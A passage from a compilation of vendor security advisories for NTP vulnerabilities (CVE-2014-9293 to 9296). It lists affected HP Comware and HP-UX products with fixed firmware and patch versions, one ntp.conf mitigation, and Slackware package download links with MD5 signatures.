Switch with\n2 Interface Slots, JE070A HP 5120-24G-PoE EI 2-slot Switch, JE071A HP\n5120-48G-PoE EI 2-slot Switch, JG236A HP 5120-24G-PoE+ EI Switch with 2\nInterface Slots, JG237A HP 5120-48G-PoE+ EI Switch with 2 Interface Slots,\nJG245A HP 5120-24G EI TAA-compliant Switch with 2 Interface Slots, JG246A HP\n5120-48G EI TAA-compliant Switch with 2 Interface Slots, JG247A HP\n5120-24G-PoE+ EI TAA-compliant Switch with 2 Slots, JG248A HP 5120-48G-PoE+\nEI TAA-compliant Switch with 2 Slots\n\n CVE-2014-9295\n\n4210G (Comware 5)\n R2221P08\n JF844A HP 4210-24G Switch, JF845A HP 4210-48G Switch, JF846A HP 4210-24G-PoE\nSwitch\n\n CVE-2014-9295\n\n5120 SI (Comware 5)\n R1513P95\n JE072A HP 5120-48G SI Switch, JE073A HP 5120-16G SI Switch, JE074A HP\n5120-24G SI Switch, JG091A HP 5120-24G-PoE+ (370W) SI Switch, JG092A HP\n5120-24G-PoE+ (170W) SI Switch\n\n CVE-2014-9295\n\n3610 (Comware 5)\n R5319P10\n JD335A HP 3610-48 Switch, JD336A HP 3610-24-4G-SFP Switch, JD337A HP\n3610-24-2G-2G-SFP Switch, JD338A HP 3610-24-SFP Switch\n\n CVE-2014-9295\n\n3600V2 (Comware 5)\n R2110P03\n JG299A HP 3600-24 v2 EI Switch, JG299B HP 3600-24 v2 EI Switch, JG300A HP\n3600-48 v2 EI Switch, JG300B HP 3600-48 v2 EI Switch, JG301A HP 3600-24-PoE+\nv2 EI Switch, JG301B HP 3600-24-PoE+ v2 EI Switch, JG301C HP 3600-24-PoE+ v2\nEI Switch, JG302A HP 3600-48-PoE+ v2 EI Switch, JG302B HP 3600-48-PoE+ v2 EI\nSwitch, JG302C HP 3600-48-PoE+ v2 EI Switch, JG303A HP 3600-24-SFP v2 EI\nSwitch, JG303B HP 3600-24-SFP v2 EI Switch, JG304A HP 3600-24 v2 SI Switch,\nJG304B HP 3600-24 v2 SI Switch, JG305A HP 3600-48 v2 SI Switch, JG305B HP\n3600-48 v2 SI Switch, JG306A HP 3600-24-PoE+ v2 SI Switch, JG306B HP\n3600-24-PoE+ v2 SI Switch, JG306C HP 3600-24-PoE+ v2 SI Switch, JG307A HP\n3600-48-PoE+ v2 SI Switch, JG307B HP 3600-48-PoE+ v2 SI Switch, JG307C HP\n3600-48-PoE+ v2 SI Switch\n\n CVE-2014-9295\n\n3100V2-48 (Comware 5)\n R2110P03\n JG315A HP 3100-48 v2 Switch, JG315B HP 3100-48 v2 Switch\n\n CVE-2014-9295\n\n3100V2 (Comware 5)\n R5203P11\n JD313B HP 3100-24-PoE v2 EI Switch, JD318B HP 3100-8 v2 EI Switch, JD319B HP\n3100-16 v2 EI Switch, JD320B HP 3100-24 v2 EI Switch, JG221A HP 3100-8 v2 SI\nSwitch, JG222A HP 3100-16 v2 SI Switch, JG223A HP 3100-24 v2 SI Switch\n\n CVE-2014-9295\n\nHP870 (Comware 5)\n R2607P35\n JG723A HP 870 Unified Wired-WLAN Appliance, JG725A HP 870 Unified Wired-WLAN\nTAA-compliant Appliance\n\n CVE-2014-9295\n\nHP850 (Comware 5)\n R2607P35\n JG722A HP 850 Unified Wired-WLAN Appliance, JG724A HP 850 Unified Wired-WLAN\nTAA-compliant Appliance\n\n CVE-2014-9295\n\nHP830 (Comware 5)\n R3507P35\n JG640A HP 830 24-Port PoE+ Unified Wired-WLAN Switch, JG641A HP 830 8-port\nPoE+ Unified Wired-WLAN Switch, JG646A HP 830 24-Port PoE+ Unified Wired-WLAN\nTAA-compliant Switch, JG647A HP 830 8-Port PoE+ Unified Wired-WLAN\nTAA-compliant\n\n CVE-2014-9295\n\nHP6000 (Comware 5)\n R2507P35\n JG639A HP 10500/7500 20G Unified Wired-WLAN Module, JG645A HP 10500/7500 20G\nUnified Wired-WLAN TAA-compliant Module\n\n CVE-2014-9295\n\nWX5004-EI (Comware 5)\n R2507P35\n JD447B HP WX5002 Access Controller, JD448A HP WX5004 Access Controller,\nJD448B HP WX5004 Access Controller, JD469A HP WX5004 Access Controller\n\n CVE-2014-9295\n\nSecBlade FW (Comware 5)\n R3181P05\n JC635A HP 12500 VPN Firewall Module, JD245A HP 9500 VPN Firewall Module,\nJD249A HP 10500/7500 Advanced VPN Firewall Module, JD250A HP 6600 Firewall\nProcessing Router Module, JD251A HP 8800 Firewall Processing Module, JD255A\nHP 5820 VPN Firewall Module\n\n CVE-2014-9295\n\nF1000-E (Comware 5)\n R3181P05\n JD272A HP F1000-E VPN Firewall Appliance\n\n CVE-2014-9295\n\nF1000-A-EI (Comware 5)\n R3734P06\n JG214A HP F1000-A-EI VPN Firewall Appliance\n\n CVE-2014-9295\n\nF1000-S-EI (Comware 5)\n R3734P06\n JG213A HP F1000-S-EI VPN Firewall Appliance\n\n CVE-2014-9295\n\nF5000-A (Comware 5)\n F3210P23\n JD259A HP A5000-A5 VPN Firewall Chassis, JG215A HP F5000 Firewall Main\nProcessing Unit, JG216A HP F5000 Firewall Standalone Chassis\n\n CVE-2014-9295\n\nU200S and CS (Comware 5)\n F5123P31\n JD273A HP U200-S UTM Appliance\n\n CVE-2014-9295\n\nU200A and M (Comware 5)\n F5123P31\n JD275A HP U200-A UTM Appliance\n\n CVE-2014-9295\n\nF5000-C/S (Comware 5)\n R3811P03\n JG650A HP F5000-C VPN Firewall Appliance, JG370A HP F5000-S VPN Firewall\nAppliance\n\n CVE-2014-9295\n\nSecBlade III (Comware 5)\n R3820P03\n JG371A HP 12500 20Gbps VPN Firewall Module, JG372A HP 10500/11900/7500\n20Gbps VPN Firewall Module\n\n CVE-2014-9295\n\nMSR20 RU (Comware 5 Low Encryption SW)\n R2513L61\n JD432A HP A-MSR20-21 Router, JD662A HP MSR20-20 Router, JD663A HP A-MSR20-21\nRouter, JD663B HP MSR20-21 Router, JD664A HP MSR20-40 Router, JF228A HP\nMSR20-40, JF283A HP MSR20-20 Router\n\n CVE-2014-9295\n\nMSR20-1X RU (Comware 5 Low Encryption SW)\n R2513L61\n JD431A HP MSR20-10 Router, JD667A HP A-MSR20-15 IW Multi-service Router,\nJD668A HP MSR20-13 Router, JD669A HP MSR20-13-W Router, JD670A HP A-MSR20-15\nA Multi-service Router, JD671A HP A-MSR20-15 AW Multi-service Router, JD672A\nHP A-MSR20-15 I Multi-service Router, JD673A HP MSR20-11 Router, JD674A HP\nMSR20-12 Router, JD675A HP MSR20-12-W Router, JD676A HP MSR20-12-T Router,\nJF236A HP MSR20-15-I Router, JF237A HP MSR20-15-A Router, JF238A HP\nMSR20-15-I-W Router, JF239A HP MSR20-11 Router, JF240A HP MSR20-13 Router,\nJF241A HP MSR20-12 Router, JF806A HP MSR20-12-T Router, JF807A HP MSR20-12-W\nRouter, JF808A HP MSR20-13-W Router, JF809A HP MSR20-15-A-W Router, JF817A HP\nMSR20-15 Router, JG209A HP MSR20-12-T-W Router, JG210A HP MSR20-13-W Router\n\n CVE-2014-9295\n\nMSR30 RU (Comware 5 Low Encryption SW)\n R2513L61\n JD654A HP MSR30-60 PoE Router, JD657A HP MSR30-40 Router, JD658A HP MSR30-60\nRouter, JD660A HP MSR30-20 PoE Router, JD661A HP MSR30-40 PoE Router, JD666A\nHP MSR30-20 Router, JF229A HP MSR30-40 Router, JF230A HP MSR30-60 Router,\nJF232A HP A-MSR30-40 (RT-MSR3040-AC-OVS-AS-H3) Multi-service Router, JF235A\nHP MSR30-20 DC Router, JF284A HP MSR30-20 Router, JF287A HP MSR30-40 DC\nRouter, JF801A HP MSR30-60 DC Router, JF802A HP MSR30-20 PoE Router, JF803A\nHP MSR30-40 PoE Router, JF804A HP MSR30-60 PoE Router, JG728A HP MSR30-20\nTAA-compliant DC Router, JG729A HP MSR30-20 TAA-compliant Router\n\n CVE-2014-9295\n\nMSR301X RU (Comware 5 Low Encryption SW)\n R2513L61\n JF800A HP MSR30-11 Router, JF816A HP MSR30-10 Router, JG182A HP MSR30-11E\nRouter, JG183A HP MSR30-11F Router, JG184A HP MSR30-10 DC Router\n\n CVE-2014-9295\n\nMSR316 RU (Comware 5 Low Encryption SW)\n R2513L61\n JD659A HP MSR30-16 PoE Router, JD665A HP MSR30-16 Router, JF233A HP MSR30-16\nRouter, JF234A HP MSR30-16 PoE Router\n\n CVE-2014-9295\n\nMSR50 RU (Comware 5 Low Encryption SW)\n R2513L61\n JD433A HP MSR50-40 Router, JD653A HP MSR50 Processor Module, JD655A HP MSR\n50-40 Router, JD656A HP MSR50-60 Router, JF231A HP MSR50-60 Router, JF285A HP\nMSR50-40 DC Router, JF640A HP MSR50-60 Router Chassis with DC Power Supply\n\n CVE-2014-9295\n\nMSR50 EPU RU (Comware 5 Low Encryption SW)\n R2513L61\n JD429A HP MSR50 G2 Processor Module, JD429B HP MSR50 G2 Processor Module,\nJD433A HP MSR50-40 Router, JD655A HP MSR 50-40 Router, JD656A HP MSR50-60\nRouter, JF231A HP MSR50-60 Router, JF285A HP MSR50-40 DC Router, JF640A HP\nMSR50-60 Router Chassis with DC Power Supply\n\n CVE-2014-9295\n\nMSR1000 RU (Comware 5 Low Encryption SW)\n R2513L61\n JG732A HP MSR1003-8 AC Router\n\n CVE-2014-9295\n\n6600 RSE RU (Comware 5 Low Encryption SW)\n R3303P18\n JC566A HP 6600 RSE-X1 Router Main Processing Unit, JG780A HP 6600 RSE-X1\nTAA-compliant Main Processing Unit\n\n CVE-2014-9295\n\n6600 RPE RU (Comware 5 Low Encryption SW)\n R3303P18\n JC165A) HP 6600 RPE-X1 Router Module, JG781A) HP 6600 RPE-X1 TAA-compliant\nMain Processing Unit\n\n CVE-2014-9295\n\n6602 RU (Comware 5 Low Encryption SW)\n R3303P18\n JC176A) HP 6602 Router Chassis\n\n CVE-2014-9295\n\nHSR6602 RU (Comware 5 Low Encryption SW)\n R3303P18\n JC177A HP 6608 Router, JC177B HP 6608 Router Chassis, JC178A HP 6604 Router\nChassis, JC178B HP 6604 Router Chassis, JC496A HP 6616 Router Chassis, JG353A\nHP HSR6602-G Router, JG354A HP HSR6602-XG Router, JG355A HP 6600 MCP-X1\nRouter Main Processing Unit, JG356A HP 6600 MCP-X2 Router Main Processing\nUnit, JG776A HP HSR6602-G TAA-compliant Router, JG777A HP HSR6602-XG\nTAA-compliant Router, JG778A HP 6600 MCP-X2 Router TAA-compliant Main\nProcessing Unit\n\n CVE-2014-9295\n\nHSR6800 RU (Comware 5 Low Encryption SW)\n R3303P18\n JG361A HP HSR6802 Router Chassis, JG362A HP HSR6804 Router Chassis, JG363A\nHP HSR6808 Router Chassis, JG364A HP HSR6800 RSE-X2 Router Main Processing\nUnit, JG779A HP HSR6800 RSE-X2 Router TAA-compliant Main Processing Unit\n\n CVE-2014-9295\n\nSMB1910 (Comware 5)\n R1108\n JG540A HP 1910-48 Switch, JG539A HP 1910-24-PoE+ Switch, JG538A HP 1910-24\nSwitch, JG537A HP 1910-8 -PoE+ Switch, JG536A HP 1910-8 Switch\n\n CVE-2014-9295\n\nSMB1920 (Comware 5)\n R1106\n JG928A HP 1920-48G-PoE+ (370W) Switch, JG927A HP 1920-48G Switch, JG926A HP\n1920-24G-PoE+ (370W) Switch, JG925A HP 1920-24G-PoE+ (180W) Switch, JG924A HP\n1920-24G Switch, JG923A HP 1920-16G Switch, JG922A HP 1920-8G-PoE+ (180W)\nSwitch, JG921A HP 1920-8G-PoE+ (65W) Switch, JG920A HP 1920-8G Switch\n\n CVE-2014-9295\n\nV1910 (Comware 5)\n R1513P95\n JE005A HP 1910-16G Switch, JE006A HP 1910-24G Switch, JE007A HP 1910-24G-PoE\n(365W) Switch, JE008A HP 1910-24G-PoE(170W) Switch, JE009A HP 1910-48G\nSwitch, JG348A HP 1910-8G Switch, JG349A HP 1910-8G-PoE+ (65W) Switch, JG350A\nHP 1910-8G-PoE+ (180W) Switch\n\n CVE-2014-9295\n\nSMB 1620 (Comware 5)\n R1105\n JG914A HP 1620-48G Switch, JG913A HP 1620-24G Switch, JG912A HP 1620-8G\nSwitch\n\n CVE-2014-9295\n\nCOMWARE 7 Products\n\n12500 (Comware 7)\n R7328P04\n JC085A HP A12518 Switch Chassis, JC086A HP A12508 Switch Chassis, JC652A HP\n12508 DC Switch Chassis, JC653A HP 12518 DC Switch Chassis, JC654A HP 12504\nAC Switch Chassis, JC655A HP 12504 DC Switch Chassis, JF430A HP A12518 Switch\nChassis, JF430B HP 12518 Switch Chassis, JF430C HP 12518 AC Switch Chassis,\nJF431A HP A12508 Switch Chassis, JF431B HP 12508 Switch Chassis, JF431C HP\n12508 AC Switch Chassis, JC072B HP 12500 Main Processing Unit, JG497A HP\n12500 MPU w/Comware V7 OS, JG782A HP FF 12508E AC Switch Chassis, JG783A HP\nFF 12508E DC Switch Chassis, JG784A HP FF 12518E AC Switch Chassis, JG785A HP\nFF 12518E DC Switch Chassis, JG802A HP FF 12500E MPU, JG836A HP FlexFabric\n12518E AC Switch TAA-compliant Chassis, JG834A HP FlexFabric 12508E AC Switch\nTAA-compliant Chassis, JG835A HP FlexFabric 12508E DC Switch TAA-compliant\nChassis, JG837A HP FlexFabric 12518E DC Switch TAA-compliant Chassis, JG803A\nHP FlexFabric 12500E TAA-compliant Main Processing Unit, JG796A HP FlexFabric\n12500 48-port 10GbE SFP+ FD Module, JG790A HP FlexFabric 12500 16-port 40GbE\nQSFP+ FD Module, JG794A HP FlexFabric 12500 40-port 10GbE SFP+ FG Module,\nJG792A HP FlexFabric 12500 40-port 10GbE SFP+ FD Module, JG788A HP FlexFabric\n12500 4-port 100GbE CFP FG Module, JG786A HP FlexFabric 12500 4-port 100GbE\nCFP FD Module, JG797A HP FlexFabric 12500 48-port 10GbE SFP+ FD TAA-compliant\nModule, JG791A HP FlexFabric 12500 16-port 40GbE QSFP+ FD TAA-compliant\nModule, JG795A HP FlexFabric 12500 40-port 10GbE SFP+ FG TAA-compliant\nModule, JG793A HP FlexFabric 12500 40-port 10GbE SFP+ FD TAA-compliant\nModule, JG789A HP FlexFabric 12500 4-port 100GbE CFP FG TAA-compliant Module,\nJG787A HP FlexFabric 12500 4-port 100GbE CFP FD TAA-compliant Module, JG798A\nHP FlexFabric 12508E Fabric Module\n H3C S12508 Routing Switch (AC-1) (0235A0GE), H3C S12518 Routing Switch\n(AC-1) (0235A0GF), H3C S12508 Chassis (0235A0E6), H3C S12508 Chassis\n(0235A38N), H3C S12518 Chassis (0235A0E7), H3C S12518 Chassis (0235A38M), H3C\n12508 DC Switch Chassis (0235A38L), H3C 12518 DC Switch Chassis (0235A38K)\n CVE-2014-9295\n\n11900 (Comware 7)\n R7169P01\n JG608A HP FF 11908-V Switch Chassis, JG609A HP FF 11900 Main Processing\nUnit, JG610A HP FF 11908 1.92Tbps Type D Fabric Module, JG611A HP FF 11900\n32p 10GbE SFP+ SF Module, JG612A HP FF 11900 48p 10GbE SFP+ SF Module, JG613A\nHP FF 11900 4p 40GbE QSFP+ SF Module, JG614A HP FF 11900 8p 40GbE QSFP+ SF\nModule, JG615A HP FF 11900 24-p 1/10GBASE-T SF Module, JG616A HP FF 11900\n2500W AC Power Supply, JG617A HP FF 11900 2400W DC Power Supply, JG618A HP FF\n11908-V Spare Fan Assy, JG918A HP FF 11900 2p 100GbE CFP SE Module\n\n CVE-2014-9295\n\n10500 (Comware 7)\n R7150\n JC611A HP 10508-V Switch Chassis, JC612A HP 10508 Switch Chassis, JC613A HP\n10504 Switch Chassis, JC748A HP 10512 Switch Chassis, JG820A HP 10504 TAA\nSwitch Chassis, JG821A HP 10508 TAA Switch Chassis, JG822A HP 10508-V TAA\nSwitch Chassis, JG823A HP 10512 TAA Switch Chassis, JG496A HP 10500 Type A\nMPU w/Comware v7 OS, JH198A HP 10500 Type D Main Processing Unit with Comware\nv7 Operating System, JH191A HP 10500 44-port GbE(SFP,LC)/ 4-port 10GbE SFP+\n(SFP+,LC) SE Module, JH192A HP 10500 48-port Gig-TRJ45SE Module, JH193A HP\n10500 16-port 10GbE SFP+ (SFP+,LC) SF Module, JH194A HP 10500 24-port 10GbE\nSFP+ (SFP+,LC) EC Module, JH195A HP 10500 6-port 40GbE QSFP+ EC Module,\nJH196A HP 10500 2-port 100GbE CFP EC Module, JH197A HP 10500 48-port 10GbE\nSFP+ (SFP+,LC) SG Module\n N/A\n CVE-2014-9295\n\n12900 (Comware 7)\n R1112\n JG619A HP FlexFabric 12910 Switch AC Chassis, JG621A HP FlexFabric 12910\nMain Processing Unit, JG632A HP FlexFabric 12916 Switch AC Chassis, JG634A HP\nFlexFabric 12916 Main Processing Unit\n\n CVE-2014-9295\n\n5900 (Comware 7)\n R2311P06\n JC772A HP 5900AF-48XG-4QSFP+ Switch, JG336A HP 5900AF-48XGT-4QSFP+ Switch,\nJG510A HP 5900AF-48G-4XG-2QSFP+ Switch, JG554A HP 5900AF-48XG-4QSFP+ TAA\nSwitch, JG838A HP FF 5900CP-48XG-4QSFP+ Switch, JH036A HP FlexFabric 5900CP\n48XG 4QSFP+ TAA-Compliant, JH037A HP 5900AF 48XGT 4QSFP+ TAA-Compliant\nSwitch, JH038A) HP 5900AF 48G 4XG 2QSFP+ TAA-Compliant\n\n CVE-2014-9295\n\n5920 (Comware 7)\n R2311P06\n JG296A HP 5920AF-24XG Switch, JG555A HP 5920AF-24XG TAA Switch\n\n CVE-2014-9295\n\nMSR1000 (Comware 7)\n R0106P31\n JG875A HP MSR1002-4 AC Router, JH060A HP MSR1003-8S AC Router\n\n CVE-2014-9295\n\nMSR2000 (Comware 7)\n R0106P31\n JG411A HP MSR2003 AC Router, JG734A HP MSR2004-24 AC Router, JG735A) HP\nMSR2004-48 Router, JG866A HP MSR2003 TAA-compliant AC Router\n\n CVE-2014-9295\n\nMSR3000 (Comware 7)\n R0106P31\n JG404A HP MSR3064 Router, JG405A HP MSR3044 Router, JG406A HP MSR3024 AC\nRouter, JG407A HP MSR3024 DC Router, JG408A HP MSR3024 PoE Router, JG409A HP\nMSR3012 AC Router, JG410A HP MSR3012 DC Router, JG861A HP MSR3024\nTAA-compliant AC Router\n\n CVE-2014-9295\n\nMSR4000 (Comware 7)\n R0106P31\n JG402A HP MSR4080 Router Chassis, JG403A HP MSR4060 Router Chassis, JG412A\nHP MSR4000 MPU-100 Main Processing Unit, JG869A HP MSR4000 TAA-compliant\nMPU-100 Main Processing Unit\n\n CVE-2014-9295\n\n5800 (Comware 7)\n R7006P12\n JC099A HP 5800-24G-PoE Switch, JC099B HP 5800-24G-PoE+ Switch, JC100A HP\n5800-24G Switch, JC100B HP 5800-24G Switch, JC101A HP 5800-48G Switch with 2\nSlots, JC101B HP 5800-48G-PoE+ Switch with 2 Interface Slots, JC103A HP\n5800-24G-SFP Switch, JC103B HP 5800-24G-SFP Switch with 1 Interface Slot,\nJC104A HP 5800-48G-PoE Switch, JC104B HP 5800-48G-PoE+ Switch with 1\nInterface Slot, JC105A HP 5800-48G Switch, JC105B HP 5800-48G Switch with 1\nInterface Slot, JG254A HP 5800-24G-PoE+ TAA-compliant Switch, JG254B HP\n5800-24G-PoE+ TAA-compliant Switch, JG255A HP 5800-24G TAA-compliant Switch,\nJG255B HP 5800-24G TAA-compliant Switch, JG256A HP 5800-24G-SFP TAA-compliant\nSwitch with 1 Interface Slot, JG256B HP 5800-24G-SFP TAA-compliant Switch\nwith 1 Interface Slot, JG257A HP 5800-48G-PoE+ TAA-compliant Switch with 1\nInterface Slot, JG257B HP 5800-48G-PoE+ TAA-compliant Switch with 1 Interface\nSlot, JG258A HP 5800-48G TAA-compliant Switch with 1 Interface Slot, JG258B\nHP 5800-48G TAA-compliant Switch with 1 Interface Slot, JG225A HP 5800AF-48G\nSwitch, JG225B HP 5800AF-48G Switch, JG242A HP 5800-48G-PoE+ TAA-compliant\nSwitch with 2 Interface Slots, JG242B HP 5800-48G-PoE+ TAA-compliant Switch\nwith 2 Interface Slots, JG243A HP 5820-24XG-SFP+ TAA-compliant Switch, JG243B\nHP 5820-24XG-SFP+ TAA-compliant Switch, JG259A HP 5820X-14XG-SFP+\nTAA-compliant Switch with 2 Interface Slots \u0026 1 OAA Slot, JG259B HP\n5820-14XG-SFP+ TAA-compliant Switch with 2 Interface Slots and 1 OAA Slot,\nJC106A HP 5820-14XG-SFP+ Switch with 2 Slots, JC106B HP 5820-14XG-SFP+ Switch\nwith 2 Interface Slots \u0026 1 OAA Slot, JG219A HP 5820AF-24XG Switch, JG219B HP\n5820AF-24XG Switch, JC102A HP 5820-24XG-SFP+ Switch, JC102B HP 5820-24XG-SFP+\nSwitch\n\n CVE-2014-9295\n\nVSR (Comware 7)\n R0204P01\n JG810AAE HP VSR1001 Virtual Services Router 60 Day Evaluation Software,\nJG811AAE HP VSR1001 Comware 7 Virtual Services Router, JG812AAE HP VSR1004\nComware 7 Virtual Services Router, JG813AAE HP VSR1008 Comware 7 Virtual\nServices Router\n\n CVE-2014-9295\n\n7900 (Comware 7)\n R2122\n JG682A HP FlexFabric 7904 Switch Chassis, JG841A HP FlexFabric 7910 Switch\nChassis, JG842A HP FlexFabric 7910 7.2Tbps Fabric / Main Processing Unit,\nJH001A HP FlexFabric 7910 2.4Tbps Fabric / Main Processing Unit\n\n CVE-2014-9295\n\n5130 (Comware 7)\n R3108P03\n JG932A HP 5130-24G-4SFP+ EI Switch, JG933A HP 5130-24G-SFP-4SFP+ EI Switch,\nJG934A HP 5130-48G-4SFP+ EI Switch, JG936A HP 5130-24G-PoE+-4SFP+ (370W) EI\nSwitch, JG937A HP 5130-48G-PoE+-4SFP+ (370W) EI Switch, JG975A HP\n5130-24G-4SFP+ EI Brazil Switch, JG976A HP 5130-48G-4SFP+ EI Brazil Switch,\nJG977A HP 5130-24G-PoE+-4SFP+ (370W) EI Brazil Switch, JG978A HP\n5130-48G-PoE+-4SFP+ (370W) EI Brazil Switch\n\n CVE-2014-9295\n\n5700 (Comware 7)\n R2311P06\n JG894A HP FlexFabric 5700-48G-4XG-2QSFP+ Switch, JG895A HP FlexFabric\n5700-48G-4XG-2QSFP+ TAA-compliant Switch, JG896A HP FlexFabric\n5700-40XG-2QSFP+ Switch, JG897A HP FlexFabric 5700-40XG-2QSFP+ TAA-compliant\nSwitch, JG898A HP FlexFabric 5700-32XGT-8XG-2QSFP+ Switch, JG899A HP\nFlexFabric 5700-32XGT-8XG-2QSFP+ TAA-compliant Switch\n\n CVE-2014-9295\n\nVCX\n 9.8.17\n J9672A HP VCX V7205 Platform w/ DL360 G7 Srvr, J9668A HP VCX IPC V7005\nPltfrm w/ DL120 G6 Srvr, JC517A HP VCX V7205 Platform w/DL 360 G6 Server,\nJE355A HP VCX V6000 Branch Platform 9.0, JC516A HP VCX V7005 Platform w/DL\n120 G6 Server, JC518A HP VCX Connect 200 Primry 120 G6 Server, J9669A HP VCX\nIPC V7310 Pltfrm w/ DL360 G7 Srvr, JE341A HP VCX Connect 100 Secondary,\nJE252A HP VCX Connect Primary MIM Module, JE253A HP VCX Connect Secondary MIM\nModule, JE254A HP VCX Branch MIM Module, JE355A HP VCX V6000 Branch Platform\n9.0, JD028A HP MS30-40 RTR w/VCX + T1/FXO/FXS/Mod, JD023A HP MSR30-40 Router\nwith VCX MIM Module, JD024A HP MSR30-16 RTR w/VCX Ent Br Com MIM, JD025A HP\nMSR30-16 RTR w/VCX + 4FXO/2FXS Mod, JD026A HP MSR30-16 RTR w/VCX + 8FXO/4FXS\nMod, JD027A HP MSR30-16 RTR w/VCX + 8BRI/4FXS Mod, JD029A HP MSR30-16 RTR\nw/VCX + E1/4BRI/4FXS, JE340A HP VCX Connect 100 Pri Server 9.0, JE342A HP VCX\nConnect 100 Sec Server 9.0\n\n CVE -2014-9293 CVE-2014-9294 CVE-2014-9295\n\nHISTORY\nVersion:1 (rev.1) - 9 December 2015 Initial release\n\nThird Party Security Patches: Third party security patches that are to be\ninstalled on systems running Hewlett Packard Enterprise (HPE) software\nproducts should be applied in accordance with the customer\u0027s patch management\npolicy. \n\nThe two patches are available from the HP Support Center (HPSC). \nhttp://h20565.www2.hp.com/portal/site/hpsc?\n\nA new B.11.31 depot for HP-UX-NTP_C.4.2.6.5.0 is available here:\n\nhttps://h20392.www2.hp.com/portal/swdepot/displayProductInfo.do?productNumber\n=HPUX-NTP\n\nThe B.11.31 image HP-UX-NTP_C.4.2.6.5.0\nThe B.11.23 patch PHNE_44236 for NTP v3.5\nThe B.11.11 patch PHNE_44235 for NTP v3.5\n\nMitigation steps for HP-UX B.11.23 and HP-UX B.11.11 for CVE-2014-9295\n\nRestrict query for server status (Time Service is not affected) from\nntpq/ntpdc by enabling noquery using the restrict command in /etc/ntp.conf\nfile. \n\nReference: http://support.ntp.org/bin/view/Main/SecurityNotice\n\nMANUAL ACTIONS: Yes - Update\n\nIf patch installation on B.11.11 or B.11.23 is not possible, mitigate with\nstep above. \n\nPRODUCT SPECIFIC INFORMATION\n\nHP-UX Software Assistant: HP-UX Software Assistant is an enhanced application\nthat replaces HP-UX Security Patch Check. It analyzes all Security Bulletins\nissued by HP and lists recommended actions that may apply to a specific HP-UX\nsystem. It can also download patches and create a depot automatically. For\nmore information see: https://www.hp.com/go/swa\nThe following text is for use by the HP-UX Software Assistant. \n\nAFFECTED VERSIONS\n\nHP-UX B.11.11\n==================\nInternetSrvcs.INETSVCS-BOOT\naction: install PHNE_44235 or subsequent\n\nHP-UX B.11.23\n==================\nInternetSrvcs.INETSVCS2-BOOT\n\naction: install PHNE_44236 or subsequent\n\nHP-UX B.11.31\n==================\nNTP.INETSVCS2-BOOT\nNTP.NTP-AUX\nNTP.NTP-RUN\naction: install revision C.4.2.6.5.0 or subsequent\n\nEND AFFECTED VERSIONS\n\nHISTORY\nVersion:1 (rev.1) - 18 February 2015 Initial release\nVersion:2 (rev.2) - 8 April 2015 Added B.11.23 and B.11.11 patches\n\nThird Party Security Patches: Third party security patches that are to be\ninstalled on systems running HP software products should be applied in\naccordance with the customer\u0027s patch management policy. For other issues about\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com. \n\n\nHere are the details from the Slackware 14.1 ChangeLog:\n+--------------------------+\npatches/packages/ntp-4.2.8-i486-1_slack14.1.txz: Upgraded. \n In addition to bug fixes and enhancements, this release fixes\n several high-severity vulnerabilities discovered by Neel Mehta\n and Stephen Roettger of the Google Security Team. \n For more information, see:\n https://www.kb.cert.org/vuls/id/852879\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9293\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9294\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9295\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9296\n (* Security fix *)\n+--------------------------+\n\n\nWhere to find the new packages:\n+-----------------------------+\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the \"Get Slack\" section on http://slackware.com for\nadditional mirror sites near you. \n\nUpdated package for Slackware 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/ntp-4.2.8-i486-1_slack13.0.txz\n\nUpdated package for Slackware x86_64 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/ntp-4.2.8-x86_64-1_slack13.0.txz\n\nUpdated package for Slackware 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/ntp-4.2.8-i486-1_slack13.1.txz\n\nUpdated package for Slackware x86_64 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/ntp-4.2.8-x86_64-1_slack13.1.txz\n\nUpdated package for Slackware 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/ntp-4.2.8-i486-1_slack13.37.txz\n\nUpdated package for Slackware x86_64 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/ntp-4.2.8-x86_64-1_slack13.37.txz\n\nUpdated package for Slackware 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/ntp-4.2.8-i486-1_slack14.0.txz\n\nUpdated package for Slackware x86_64 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/ntp-4.2.8-x86_64-1_slack14.0.txz\n\nUpdated package for Slackware 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/ntp-4.2.8-i486-1_slack14.1.txz\n\nUpdated package for Slackware x86_64 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/ntp-4.2.8-x86_64-1_slack14.1.txz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/ntp-4.2.8-i486-1.txz\n\nUpdated package for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/ntp-4.2.8-x86_64-1.txz\n\n\nMD5 signatures:\n+-------------+\n\nSlackware 13.0 package:\n18d7f09e90cf2434f59d7e9f11478fba ntp-4.2.8-i486-1_slack13.0.txz\n\nSlackware x86_64 13.0 package:\nedd178e3d2636433dd18f52331af17a5 ntp-4.2.8-x86_64-1_slack13.0.txz\n\nSlackware 13.1 package:\n4b6da6fa564b1fe00920d402ff97bd43 ntp-4.2.8-i486-1_slack13.1.txz\n\nSlackware x86_64 13.1 package:\n292ae7dbd3ea593c5e28cbba7c2b71fa ntp-4.2.8-x86_64-1_slack13.1.txz\n\nSlackware 13.37 package:\n294b8197d360f9a3cf8186619b60b73c ntp-4.2.8-i486-1_slack13.37.txz\n\nSlackware x86_64 13.37 package:\n7cd5b63f8371b1cc369bc56e4b4efd5a ntp-4.2.8-x86_64-1_slack13.37.txz\n\nSlackware 14.0 